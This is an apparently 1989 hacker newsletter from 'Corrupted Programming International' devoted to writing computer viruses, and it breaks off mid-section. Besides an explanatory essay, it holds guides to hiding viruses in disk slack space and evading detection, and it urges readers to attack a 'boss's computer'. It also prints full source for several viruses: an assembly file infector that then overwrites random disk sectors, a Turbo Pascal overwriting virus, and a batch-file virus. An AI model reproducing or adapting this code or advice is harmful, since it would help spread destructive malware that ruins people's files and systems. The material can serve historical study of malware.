[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * * @@@@ @@@@ @@@@ @@@@ @@@ * * @@@ @@@ @@@@ @@@ * * @@@ @@@@@@@@@@@@@@@ @@@ * * @@@ @@@@@@@@@@@@@@ @@@ * * @@@ @@@ @@@ * * @@@@ @@@@ @@@ @@@ * * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * C O R R U P T E D P R O G R A M M I N G I N T E R N A T I O N A L presents: @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ Virili And Trojan Horses @ @ @ @ A Protagonist's Point Of View @ @ @ @ Issue #2 @ @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ DISCLAIMER::All of the information contained in this newsletter reflects the thoughts and ideas of the authors, not their actions. The sole purpose of this document is to educate and spread information. Any illegal or illicit action is not endorsed by the authors or CPI. The authors and CPI are not responsible for any information which may present itself as old or mis-interpreted, and actions by the reader. Remember, 'Just Say No!' CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ Introduction To CPI#2 --------------------- Well, here is the "long awaited" second issue of CPI, A Protagonist's Point of view. This issue should prove a bit interesting, I dunno, but at least entertaining for the time it takes to read. Enjoy the information and don't forget the disclaimer. Oh yes, if you have some interesting articles or an application to send us, just see the BBS list at the end of this document. Thanx. All applications and information will be voted on through the CPI Inner Circle. Hope you enjoy this issue as much as we enjoyed typing it... hehe... Until our next issue, (which may be whenever), good-bye. Doctor Dissector Table of Contents ----------------- Part Title Author ----------------------------------------------------------------------------- 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak 2.3 V-IDEA-1.............................................. Ashton Darkside 2.4 V-IDEA-2.............................................. Ashton Darkside 2.5 The Generic Virus..................................... Doctor Dissector 2.6 Aids.................................................. Doctor Dissector 2.7 Batch File Virus...................................... PHUN 3.2 2.8 Basic Virus........................................... PHUN 3.2 2.9 The Alemeda Virus..................................... PHUN 4.3 2.10 Virili In The News.................................... Various Sources 2.11 Application For CPI................................... CPI Inner Circle (CPI Node Phone #'s Are In 2.11) [2.2] Explanation of Viruses and Trojans Horses ----------------------------------------- Written by Acid Phreak Like it's biological counterpart, a computer virus is an agent of infection, insinuating itself into a program or disk and forcing its host to replicate the virus code. Hackers fascinated by the concept of "living" code wrote the first viruses as projects or as pranks. In the past few years, however, a different kind of virus has become common, one that lives up to an earlier meaning of the word: in Latin, virus means poison. These new viruses incorporate features of another type of insidious program called a Trojan horse. Such a program masquerades as a useful utility or product but wreaks havoc on your system when you run it. It may erase a few files, format your disk, steal secrets--anything software can do, a Trojan horse can do. A malicious virus can do all this then attempt to replicate itself and infect other systems. The growing media coverage of the virus conceptand of specific viruse has promoted the development of a new type of software. Antivirus programs, vaccines--they go by many names, but their purpose is to protect from virus attack. At present there are more antivirus programs than known viruses (not for long). Some experts quibble about exactly what a virus is. The most widely known viruses, the IBM Xmas virus and the recent Internet virus, are not viruses according to some experts because they do not infect other programs. Others argue that every Trojan horse is a virus--one that depends completely on people to spread it. How They Reproduce: ------------------- Viruses can't travel without people. Your PC will not become infected unless someone runs an infected program on it, whether accidentally or on purpose. PC's are different from mainframe networks in this way--the mainframe Internet virus spread by transmitting itself to other systems and ordering them to execute it as a program. That kind of active transmission is not possible on a PC. Virus code reproduces by changing something in your system. Some viruses strike COMMAND.COM or the hidden system files. Others, like the notorious Pakistani-Brain virus, modify the boot sector of floppy disks. Still others attach themselves to any .COM or .EXE file. In truth, any file on your system that can be executed--whether it's a program, a device driver, an overlay, or even a batch file--could be the target of a virus. When an infected program runs, the virus code usually executes first and then transfers control to the original program. The virus may immediately infect other programs, or it may load itself into RAM and continue spreading. If the virus can infect a file that will be used on another system, it has succeeded. What They Can Do: ----------------- Viruses go through two phases: a replication phase and an action phase. The action doesn't happen until a certain even occurs--perhaps reaching a special date or running the virus a certain number of times. It wouldn't make sense for a virus to damage your system the first time it ran; it needs some time to grow and spread first. The most vulnerable spot for a virus attack is your hard disk's file allocation table (FAT). This table tells DOS where every file's data resides on the disk. Without the FAT, the data's still there but DOS can't find it. A virus could also preform a low-level format on some or all the tracks of your hard disk, erase all files, or change the CMOS memory on AT-class computers so that they don't recognize the hard disk. Most of the dangers involve data only, but it's even possible to burn out a monochrome monitor with the right code. Some virus assaults are quite subtl. One known virus finds four consecutive digits on the screen and switches two. Let's hope you're not balancing the company's books when this one hits. Others slow down system operations or introduce serious errors. [2.3] ------------------------------------------------------------------------------- ______ ________ ___________ / ____ \ | ____ \ |____ ____| | / \_| | | \ | | | | | | |_____| | | | | | | ______/ | | | | _ | | | | | \____/ | /\ | | /\ ____| |____ /\ \______/ \/ |_| \/ |___________| \/ "We ain't the phucking Salvation Army." ------------------------------------------------------------------------------- C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L * * * present * * * "Ok, I've written the virus, now where the hell do I put it?" By Ashton Darkside (DUNE / SATAN / CPI) ******************************************************************************* DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we "just say no" to doing it. ******************************************************************************* Ok, wow! You've just invented the most incredibly nifty virus. It slices, it dices, it squshes, it mushes (sorry Berke Breathed) people's data! But the only problem is, if you go around infecting every damn file, some cute software company is going to start putting in procedures that checksum their warez each time they run, which will make life for your infecting virus a total bitch. Or somebody's going to come up with an incredibly nifty vaccination util that will wipe it out. Because, i mean, hey, when disk space starts vanishing suddenly in 500K chunks people tend to notice. Especially people like me that rarely have more than 4096 bytes free on their HD anyway. Ok. So you're saying "wow, so what, I can make mine fool-proof", etc, etc. But wait! There's no need to go around wasting your precious time when the answer is right there in front of you! Think about it, you could be putting that time into writing better and more inovative viruses, or you could be worring about keeping the file size, the date & time, and the attributes the same. With this system, you only need to infect one file, preferably one that's NOT a system file, but something that will get run alot, and will be able to load your nifty virus on a daily basis. This system also doesn't take up any disk space, other than the loader. And the loader could conceivably be under 16 bytes (damn near undetectable). First of all, you need to know what programs to infect. Now, everybody knows about using COMMAND.COM and that's unoriginal anyway, when there are other programs people run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or WordPerfect; you get the idea. Better still are dos commands like Format, Link or even compression utilities. But you get the point. Besides, who's going to miss 16 bytes, right? Now, the good part: where to put the damn thing. One note to the programmer: This could get tricky if your virus is over 2k or isn't written in Assembly, but the size problem is easy enough, it would be a simple thing to break your virus into parts and have the parts load each other into the system so that you do eventually get the whole thing. The only problem with using languages besides assembly is that it's hard to break them up into 2k segments. If you want to infect floppys, or smaller disks, you'd be best off to break your file into 512 byte segments, since they're easier to hide. But, hey, in assembly, you can generate pretty small programs that do alot, tho. Ok, by now you've probably figured out that we're talking about the part of the disk called 'the slack'. Every disk that your computer uses is divided up into parts called sectors, which are (in almost all cases) 512 bytes. But in larger disks, and even in floppies, keeping track of every single sector would be a complete bitch. So the sectors are bunched together into groups called 'clusters'. On floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard disks, they're typically 4096 bytes, or eight sectors. Now think about it, you have programs on your hard disk, and what are the odds that they will have sizes that always end up in increments of 4096? If I've lost you, think of it this way: the file takes up a bunch of clusters, but in the last cluster it uses, there is usually some 'slack', or space that isn't used by the file. This space is between where the actual file ends and where the actual cluster ends. So, potentially, you can have up to 4095 bytes of 'slack' on a file on a hard disk, or 1023 bytes of 'slack' on a floppy. In fact, right now, run the Norton program 'FS /S /T' command from your root directory, and subtract the total size of the files from the total disk space used. That's how much 'slack' space is on your disk (a hell of alot, even on a floppy). To use the slack, all you need to do is to find a chunk of slack big enough to fit your virus (or a segment of your virus) and use direct disk access (INT 13) to put your virus there. There is one minor problem with this. Any disk write to that cluster will overwrite the slack with 'garbage' from memory. This is because of the way DOS manages it's disk I/O and it can't be fixed without alot of hassles. But, there is a way around even this. And it involves a popular (abeit outdated and usually ineffectual) form of virus protection called the READ-ONLY flag. This flag is the greatest friend of this type of virus. Because if the file is not written to, the last cluster is not written to, and voila! Your virus is safe from mischivious accidents. And since the R-O flag doesn't affect INT 13 disk I/O, it won't be in your way. Also, check for programs with the SYSTEM flag set because that has the same Read-only effect (even tho I haven't seen it written, it's true that if the file is designated system, DOS treats it as read-only, whether the R-O flag is set or not). The space after IBMBIOS.COM or IBMDOS.COM in MS-DOS (not PC-DOS, it uses different files, or so I am told; I've been too lazy to find out myself) or a protected (!) COMMAND.COM file in either type of DOS would be ideal for this. All you have to do is then insert your loader into some innocent-looking file, and you are in business. All your loader has to do is read the sector into the highest part of memory, and do a far call to it. Your virus cann then go about waiting for floppy disks to infect, and place loaders on any available executable file on the disk. Sound pretty neet? It is! Anyway, have fun, and be sure to upload your virus, along with a README file on how it works to CPI Headquarters so we can check it out! And remember: don't target P/H/P boards (that's Phreak/Hack/Pirate boards) with ANY virus. Even if the Sysop is a leech and you want to shove his balls down his throat. Because if all the PHP boards go down (especially members of CPI), who the hell can you go to for all these nifty virus ideas? And besides, it's betraying your own people, which is uncool even if you are an anarchist. So, target uncool PD boards, or your boss's computer or whatever, but don't attack your friends. Other than that, have phun, and phuck it up! Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applicaitons Network (SATAN) Corrupted Programmers International (CPI) PS: Watch it, this file (by itself) has about 3 1/2k of slack (on a hard disk). Call these boards because the sysops are cool: Oblivion (SATAN HQ) Sysop: Agent Orange (SATAN leader) System: Utopia (SATAN HQ) Sysop: Robbin' Hood (SATAN leader) The Andromeda Strain (CPI HQ) Sysop: Acid Phreak (CPI leader) D.U.N.E. (DUNE HQ) Sysop: Freddy Krueger (DUNE leader) The Jolly Bardsmen's Pub & Tavern The Sierra Crib The Phrozen Phorest Knight Shadow's Grotto And if I forgot your board, sorry, but don't send me E-mail bitching about it! [2.4] ------------------------------------------------------------------------------- ______ ________ ___________ / ____ \ | ____ \ |____ ____| | / \_| | | \ | | | | | | |_____| | | | | | | ______/ | | | | _ | | | | | \____/ | /\ | | /\ ____| |____ /\ \______/ \/ |_| \/ |___________| \/ "We ain't the phucking Salvation Army." ------------------------------------------------------------------------------- C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L * * * present * * * CPI Virus Standards - Protect yourself and your friends By Ashton Darkside (DUNE / SATAN / CPI) ******************************************************************************* DISCLAIMER: This text file is provided to the masses for INFORMATIONAL PURPOSES ONLY! The author does NOT condone the use of this information in any manner that would be illegal or harmful. The fact that the author knows and spreads this information in no way suggests that he uses it. The author also accepts no responsibility for the malicious use of this information by anyone who reads it! Remember, we may talk alot, but we "just say no" to doing it. ******************************************************************************* One of the main problems with viruses is that once you set one loose, it is no longer under your control. I propose to stop this by introducing some standards of virus writing that will enable them to be deactivated whenever they enter a 'friendly' (CPI) system. In the long run, even the author of the virus is not immune to being attacked. The following are what I have termed the CPI standards for writing viruses. They will allow a virus to easily check any system they are being run on for a type of 'identity badge'. If it is found, the virus will not infect the system it is being run on. The other standards are mostly written around this. CPI Standards for writing viruses - 1 - The virus will have an 'active period' and an 'inactive period'. The active periods will be no more than one year in length (to make it more difficult to discover the virus). You may release different versions of your virus with different 'active periods'. It is not recommended that your virus deactivate itself after the set active period, as this would enable people to deactivate viruses by using their computer with the date set to 2069 or something. It is also required that activation periods begin on January 1 and end on December 31. This will coincide with the changing identity codes. 2 - The virus will check for an identity code by executing Interrrupt 12h with the following register settings: AX - 4350, BX - 4920, CX - AB46, DX - 554E. If the system is friendly, then a pointer will be returned in CX:DX to an ASCIIZ (0-terminated) string which will have different contents in different years. The codes are not to be included in any text file, and should only be given through E-mail on CPI affiliated systems. You can always ask me by sending me mail at The Andromeda Strain BBS. If a system is detected as friendly, the virus will not attempt to infect or damage it, but it is ok to display a little greeting message about how lucky the user was. 3 - We very much encourage you to upload your virus, along with a breif description on the workings into the CPI section at The Andromeda Strain BBS. Only CPI members will know about your virus. This is so that CPI members can share techniques and it also allows us to verify that the identity check works. If we see any improvements that could be made, such as ways to streamline code, better ways of spreading, etc. we will inform you so that you can make the changes if you wish. 4 - It is also suggested that you use ADS standard for virus storage on infected disks. This meathod uses disk slack space for storage and is more thoroughly described in a previous text file by me. I think that this is the most effective and invisible way to store viruli. 5 - A list of CPI-Standard viruli will be avaliable at all times from The Andromeda Strain BBS, to CPI users. Identity strings will also be available to anyone in CPI, or anyone who uploads source code to a virus which is 100% complete except for the Identity string (it must be written to CPI-Standards). Non-CPI members who do this will be more seriously considered for membership in CPI. Ashton Darkside Dallas Underground Network Exchange (DUNE) Software And Telecom Applications Network (SATAN) Corrupted Programmers International (CPI) PS: This file (by itself) has approx 2.5k of slack. ;[2.5] ;============================================================================= ; ; C*P*I ; ; CORRUPTED PROGRAMMING INTERNATIONAL ; ----------------------------------- ; p r e s e n t s ; ; T H E ; _ _ ; (g) GENERIC VIRUS (g) ; ^ ^ ; ; ; A GENERIC VIRUS - THIS ONE MODIFIES ALL COM AND EXE FILES AND ADDS A BIT OF ; CODE IN AND MAKES EACH A VIRUS. HOWEVER, WHEN IT MODIFIES EXE FILES, IT ; RENAMES THE EXE TO A COM, CAUSING DOS TO GIVE THE ERROR "PROGRAM TO BIG TO ; FIT IN MEMORY" THIS WILL BE REPAIRED IN LATER VERSIONS OF THIS VIRUS. ; ; WHEN IT RUNS OUT OF FILES TO INFECT, IT WILL THEN BEGIN TO WRITE GARBAGE ON ; THE DISK. HAVE PHUN WITH THIS ONE. ; ; ALSO NOTE THAT THE COMMENTS IN (THESE) REPRESENT DESCRIPTION FOR THE CODE ; IMMEDIATE ON THAT LINE. THE OTHER COMMENTS ARE FOR THE ENTIRE ;| GROUPING. ; ; THIS FILE IS FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR AND CPI WILL NOT BE ; HELD RESPONSIBLE FOR ANY ACTIONS DUE TO THE READER AFTER INTRODUCTION OF ; THIS VIRUS. ALSO, THE AUTHOR AND CPI DO NOT ENDORSE ANY KIND OF ILLEGAL OR ; ILLICIT ACTIVITY THROUGH THE RELEASE OF THIS FILE. ; ; DOCTOR DISSECTOR ; CPI INNER CIRCLE ; ;============================================================================= MAIN: NOP ;| Marker bytes that identify this program NOP ;| as infected/a virus NOP ;| MOV AX,00 ;| Initialize the pointers MOV ES:[POINTER],AX ;| MOV ES:[COUNTER],AX ;| MOV ES:[DISKS B],AL ;| MOV AH,19 ;| Get the selected drive (dir?) INT 21 ;| MOV CS:DRIVE,AL ;| Get current path (save drive) MOV AH,47 ;| (dir?) MOV DH,0 ;| ADD AL,1 ;| MOV DL,AL ;| (in actual drive) LEA SI,CS:OLD_PATH ;| INT 21 ;| MOV AH,0E ;| Find # of drives MOV DL,0 ;| INT 21 ;| CMP AL,01 ;| (Check if only one drive) JNZ HUPS3 ;| (If not one drive, go the HUPS3) MOV AL,06 ;| Set pointer to SEARCH_ORDER +6 (one drive) HUPS3: MOV AH,0 ;| Execute this if there is more than 1 drive LEA BX,SEARCH_ORDER ;| ADD BX,AX ;| ADD BX,0001 ;| MOV CS:POINTER,BX ;| CLC ;| CHANGE_DISK: ;| Carry is set if no more .COM files are JNC NO_NAME_CHANGE ;| found. From here, .EXE files will be MOV AH,17 ;| renamed to .COM (change .EXE to .COM) LEA DX,CS:MASKE_EXE ;| but will cause the error message "Program INT 21 ;| to large to fit in memory" when starting CMP AL,0FF ;| larger infected programs JNZ NO_NAME_CHANGE ;| (Check if an .EXE is found) MOV AH,2CH ;| If neither .COM or .EXE files can be found, INT 21 ;| then random sectors on the disk will be MOV BX,CS:POINTER ;| overwritten depending on the system time MOV AL,CS:[BX] ;| in milliseconds. This is the time of the MOV BX,DX ;| complete "infection" of a storage medium. MOV CX,2 ;| The virus can find nothing more to infect MOV DH,0 ;| starts its destruction. INT 26 ;| (write crap on disk) NO_NAME_CHANGE: ;| Check if the end of the search order table MOV BX,CS:POINTER ;| has been reached. If so, end. DEC BX ;| MOV CS:POINTER,BX ;| MOV DL,CS:[BX] ;| CMP DL,0FF ;| JNZ HUPS2 ;| JMP HOPS ;| HUPS2: ;| Get a new drive from the search order table MOV AH,0E ;| and select it, beginning with the ROOT dir. INT 21 ;| (change drive) MOV AH,3B ;| (change path) LEA DX,PATH ;| INT 21 ;| JMP FIND_FIRST_FILE ;| FIND_FIRST_SUBDIR: ;| Starting from the root, search for the MOV AH,17 ;| first subdir. First, (change .exe to .com) LEA DX,CS:MASKE_EXE ;| convert all .EXE files to .COM in the INT 21 ;| old directory. MOV AH,3B ;| (use root directory) LEA DX,PATH ;| INT 21 ;| MOV AH,04E ;| (search for first subdirectory) MOV CX,00010001B ;| (dir mask) LEA DX,MASKE_DIR ;| INT 21 ;| JC CHANGE_DISK ;| MOV BX,CS:COUNTER ;| INC BX ;| DEC BX ;| JZ USE_NEXT_SUBDIR ;| FIND_NEXT_SUBDIR: ;| Search for the next sub-dir, if no more MOV AH,4FH ;| are found, the (search for next subdir) INT 21 ;| drive will be changed. JC CHANGE_DISK ;| DEC BX ;| JNZ FIND_NEXT_SUBDIR ;| USE_NEXT_SUBDIR: MOV AH,2FH ;| Select found directory. (get dta address) INT 21 ;| ADD BX,1CH ;| MOV ES:[BX],W"\" ;| (address of name in dta) INC BX ;| PUSH DS ;| MOV AX,ES ;| MOV DS,AX ;| MOV DX,BX ;| MOV AH,3B ;| (change path) INT 21 ;| POP DS ;| MOV BX,CS:COUNTER ;| INC BX ;| MOV CS:COUNTER,BX ;| FIND_FIRST_FILE: ;| Find first .COM file in the current dir. MOV AH,04E ;| If there are none, (Search for first) MOV CX,00000001B ;| search the next directory. (mask) LEA DX,MASKE_COM ;| INT 21 ;| JC FIND_FIRST_SUBDIR ;| JMP CHECK_IF_ILL ;| FIND_NEXT_FILE: ;| If program is ill (infected) then search MOV AH,4FH ;| for another. (search for next) INT 21 ;| JC FIND_FIRST_SUBDIR ;| CHECK_IF_ILL: ;| Check if already infected by virus. MOV AH,3D ;| (open channel) MOV AL,02 ;| (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| (save channel) MOV AH,3FH ;| (read file) MOV CH,BUFLEN ;| MOV DX,BUFFER ;| (write in buffer) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV BX,CS:[BUFFER] ;| (look for three NOP's) CMP BX,9090 ;| JZ FIND_NEXT_FILE ;| MOV AH,43 ;| This section by-passes (write enable) MOV AL,0 ;| the MS/PC DOS Write Protection. MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV AH,43 ;| MOV AL,01 ;| AND CX,11111110B ;| INT 21 ;| MOV AH,3D ;| Open file for read/write (open channel) MOV AL,02 ;| access (read/write) MOV DX,9EH ;| (address of name in dta) INT 21 ;| MOV BX,AX ;| Read date entry of program and (channel) MOV AH,57 ;| save for future use. (get date) MOV AL,0 ;| INT 21 ;| PUSH CX ;| (save date) PUSH DX ;| MOV DX,CS:[CONTA W] ;| The jump located at 0100h (save old jmp) MOV CS:[JMPBUF],DX ;| the program will be saved for future use. MOV DX,CS:[BUFFER+1] ;| (save new jump) LEA CX,CONT-100 ;| SUB DX,CX ;| MOV CS:[CONTA],DX ;| MOV AH,57 ;| The virus now copies itself to (write date) MOV AL,1 ;| to the start of the file. POP DX ;| POP CX ;| (restore date) INT 21 ;| MOV AH,3EH ;| (close file) INT 21 ;| MOV DX,CS:[JMPBUF] ;| Restore the old jump address. The virus MOV CS:[CONTA],DX ;| at address "CONTA" the jump which was at the ;| start of the program. This is done to HOPS: ;| preserve the executability of the host NOP ;| program as much as possible. After saving, CALL USE_OLD ;| it still works with the jump address in the ;| virus. The jump address in the virus differs ;| from the jump address in memory CONT DB 0E9 ;| Continue with the host program (make jump) CONTA DW 0 ;| MOV AH,00 ;| INT 21 ;| USE_OLD: MOV AH,0E ;| Reactivate the selected (use old drive) MOV DL,CS:DRIVE ;| drive at the start of the program, and INT 21 ;| reactivate the selected path at the start MOV AH,3B ;| of the program.(use old drive) LEA DX,OLD_PATH-1 ;| (get old path and backslash) INT 21 ;| RET ;| SEARCH_ORDER DB 0FF,1,0,2,3,0FF,00,0FF POINTER DW 0000 ;| (pointer f. search order) COUNTER DW 0000 ;| (counter f. nth. search) DISKS DB 0 ;| (number of disks) MASKE_COM DB "*.COM",00 ;| (search for com files) MASKE_DIR DB "*",00 ;| (search for dir's) MASKE_EXE DB 0FF,0,0,0,0,0,00111111XB DB 0,"????????EXE",0,0,0,0 DB 0,"????????COM",0 MASKE_ALL DB 0FF,0,0,0,0,0,00111111XB DB 0,"???????????",0,0,0,0 DB 0,"????????COM",0 BUFFER EQU 0E00 ;| (a safe place) BUFLEN EQU 208H ;| Length of virus. Modify this accordingly ;| if you modify this source. Be careful ;| for this may change! JMPBUF EQU BUFFER+BUFLEN ;| (a safe place for jmp) PATH DB "\",0 ;| (first place) DRIVE DB 0 ;| (actual drive) BACK_SLASH DB "\" OLD_PATH DB 32 DUP (?) ;| (old path) [2.6] +-------------------------------+ +--------------------------------------+ | | P | | | @@@@@@@ @@@@@@@@ @@@@@@@@ | * | ##### ##### #### ##### | | @@ @@ @@ @@ | R | # # # # # # | | @@ @@ @@ @@ | * | ##### # # # ##### | | @@ @@@@@@@@ @@ | E | # # # # # # | | @@ @@ @@ | * | # # ##### #### ##### | | @@ @@ @@ | S | | | @@@@@@@ @@ @@@@@@@@ | * +--------------------------------------+ | | E | A NEW AND IMPROVED VIRUS FOR | +-------------------------------+ * | PC/MS DOS MACHINES | | C O R R U P T E D | N +--------------------------------------+ | | * | CREATED BY: DOCTOR DISSECTOR | | P R O G R A M M I N G | T |FILE INTENDED FOR EDUCATIONAL USE ONLY| | | * | AUTHOR NOT RESPONSIBLE FOR READERS | | I N T E R N A T I O N A L | S |DOES NOT ENDORSE ANY ILLEGAL ACTIVITYS| +-------------------------------+ +--------------------------------------+ Well well, here it is... I call it AIDS... It infects all COM files, but it is not perfect, so it will also change the date/time stamp to the current system. Plus, any READ-ONLY attributes will ward this virus off, it doesn't like them! Anyway, this virus was originally named NUMBER ONE, and I modified the code so that it would fit my needs. The source code, which is included with this neato package was written in Turbo Pascal 3.01a. Yeah I know it's old, but it works. Well, I added a few things, you can experiment or mess around with it if you'd like to, and add any mods to it that you want, but change the name and give us some credit if you do. The file is approximately 13k long, and this extra memory will be added to the file it picks as host. If no more COM files are to be found, it picks a random value from 1-10, and if it happens to be the lucky number 7, AIDS will present a nice screen with lots of smiles, with a note telling the operator that their system is now screwed, I mean permanantly. The files encrypted containing AIDS in their code are IRREVERSIBLY messed up. Oh well... Again, neither CPI nor the author of Number One or AIDS endorses this document and program for use in any illegal manner. Also, CPI, the author to Number One and AIDS is not responsible for any actions by the readers that may prove harm in any way or another. This package was written for EDUCATIONAL purposes only! { Beginning of source code, Turbo Pascal 3.01a } {C-} {U-} {I-} { Wont allow a user break, enable IO check } { -- Constants --------------------------------------- } Const VirusSize = 13847; { AIDS's code size } Warning :String[42] { Warning message } = 'This File Has Been Infected By AIDS! HaHa!'; { -- Type declarations------------------------------------- } Type DTARec =Record { Data area for file search } DOSnext :Array[1..21] of Byte; Attr : Byte; Ftime, FDate, FLsize, FHsize : Integer; FullName: Array[1..13] of Char; End; Registers = Record {Register set used for file search } Case Byte of 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer); 2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte); End; { -- Variables--------------------------------------------- } Var { Memory offset program code } ProgramStart : Byte absolute Cseg:$100; { Infected marker } MarkInfected : String[42] absolute Cseg:$180; Reg : Registers; { Register set } DTA : DTARec; { Data area } Buffer : Array[Byte] of Byte; { Data buffer } TestID : String[42]; { To recognize infected files } UsePath : String[66]; { Path to search files } { Lenght of search path } UsePathLenght: Byte absolute UsePath; Go : File; { File to infect } B : Byte; { Used } LoopVar : Integer; {Will loop forever} { -- Program code------------------------------------------ } Begin GetDir(0, UsePath); { get current directory } if Pos('\', UsePath) <> UsePathLenght then UsePath := UsePath + '\'; UsePath := UsePath + '*.COM'; { Define search mask } Reg.AH := $1A; { Set data area } Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 } Reg.AH := $4E; Reg.DS := Seg(UsePath); Reg.DX := Ofs(UsePath[1]); Reg.CX := $ff; { Set attribute to find ALL files } MsDos(Reg); { Find first matching entry } IF not Odd(Reg.Flags) Then { If a file found then } Repeat UsePath := DTA.FullName; B := Pos(#0, UsePath); If B > 0 then Delete(UsePath, B, 255); { Remove garbage } Assign(Go, UsePath); Reset(Go); If IOresult = 0 Then { If not IO error then } Begin BlockRead(Go, Buffer, 2); Move(Buffer[$80], TestID, 43); { Test if file already ill(Infected) } If TestID <> Warning Then { If not then ... } Begin Seek (Go, 0); { Mark file as infected and .. } MarkInfected := Warning; { Infect it } BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7)); Close(Go); Halt; {.. and halt the program } End; Close(Go); End; { The file has already been infected, search next. } Reg.AH := $4F; Reg.DS := Seg(DTA); Reg.DX := Ofs(DTA); MsDos(Reg); { ......................Until no more files are found } Until Odd(Reg.Flags); Loopvar:=Random(10); If Loopvar=7 then begin Writeln(' '); {Give a lot of smiles} Writeln(''); Writeln(' '); Writeln('  ATTENTION: '); Writeln('  I have been elected to inform you that throughout your process of '); Writeln('  collecting and executing files, you have accidentally H��K� '); Writeln('  yourself over; again, that''s PHUCKED yourself over. No, it cannot '); Writeln('  be; YES, it CAN be, a ���s has infected your system. Now what do '); Writeln('  you have to say about that? HAHAHAHA. Have H�� with this one and '); Writeln('  remember, there is NO cure for '); Writeln('  '); Writeln('  ���������� ������������ ����������� ���������� '); Writeln('  ��۱�������� �����۱����� �۱��������� ��۱�������� '); Writeln('  �۱� �۱ �۱ �۱ �۱ �۱� �� '); Writeln('  �۱ �۱ �۱ �۱ �۱ �۱ '); Writeln('  �����������۱ �۱ �۱ �۱ ������������ '); Writeln('  �۱��������۱ �۱ �۱ �۱ ����������۱ '); Writeln('  �۱ �۱ �۱ �۱ �۱ �۱ '); Writeln('  �۱ �۱ �۱ �۱ ��۱ �� ��۱ '); Writeln('  �۱ �۱ ������������ ����������۱� ���������۱� '); Writeln('  �� �� ������������ ����������� ���������� '); Writeln('  '); Writeln(' '); REPEAT LOOPVAR:=0; UNTIL LOOPVAR=1; end; End. { Although this is a primitive virus its effective. } { In this virus only the .COM } { files are infected. Its about 13K and it will } { change the date entry. } [2.7] Batch Viruses ------------- Whoever thought that viruses could be in BATCH file.This virus which we are about to see makes use of MS-DOS operating system. This BATCH virus uses DEBUG & EDLIN programs. Name: VR.BAT echo = off ( Self explanatory) ctty nul ( This is important. Console output is turned off) path c:\msdos ( May differ on other systems ) dir *.com/w>ind ( The directory is written on "ind" ONLY name entries) edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear) debug ind<2 ( New batch program is created with debug) edlin name.bat<3 ( This batch goes to an executable form because of EDLIN) ctty con ( Console interface is again assigned) name ( Newly created NAME.BAT is called. In addition to file to this Batch file,there command files,here named 1,2,3 Here is the first command file: ------------------------------- Name: 1 1,4d ( Here line 1-4 of the "IND" file are deleted ) e ( Save file ) Here is the second command file: -------------------------------- Name: 2 m100,10b,f000 (First program name is moved to the F000H address to save) e108 ".BAT" (Extention of file name is changed to .BAT) m100,10b,f010 (File is saved again) e100"DEL " (DEL command is written to address 100H) mf000,f00b,104 (Original file is written after this command) e10c 2e (Period is placed in from of extension) e110 0d,0a (Carrige return+ line feed) mf010,f020,11f ( Modified file is moved to 11FH address from buffer area) e112 "COPY \VR.BAT" ( COPY command is now placed in front of file) e12b od,0a (COPY command terminated with carriage return + lf) rxc ( The CX register is ... ) 2c ( set to 2CH) nname.bat ( Name it NAME.BAT) w ( Write ) q ( quit ) The third command file must be printed as a hex dump because it contains 2 control characters (1Ah=Control Z) and this is not entirely printable. Hex dump of the third command file: ----------------------------------- Name: 3 0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79 1 , 1 ? . . n y y y y y y y 0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79 y . 2 , ? ? r . . n n y y y 0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00 y y y y . E . . . . . . . . . In order for this virus to work VR.BAT should be in the root. This program only affects .COM files. [2.8] Viruses in Basic ---------------- Basic is great language and often people think of it as a limited language and will not be of any use in creating something like a virus. Well you are really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987. This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE files.To do this you must compile the source code using a the Microsoft Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit the source code to place the lenght of the object program in the LENGHTVIR variable. BV3.EXE should be in the current directory, COMMAND.COM must be available, the LENGHTVIR variable must be set to the lenght of the linked program and remember to use /e parameter when compiling. 10 REM ** DEMO 20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED ** 30 REM ** BASIC 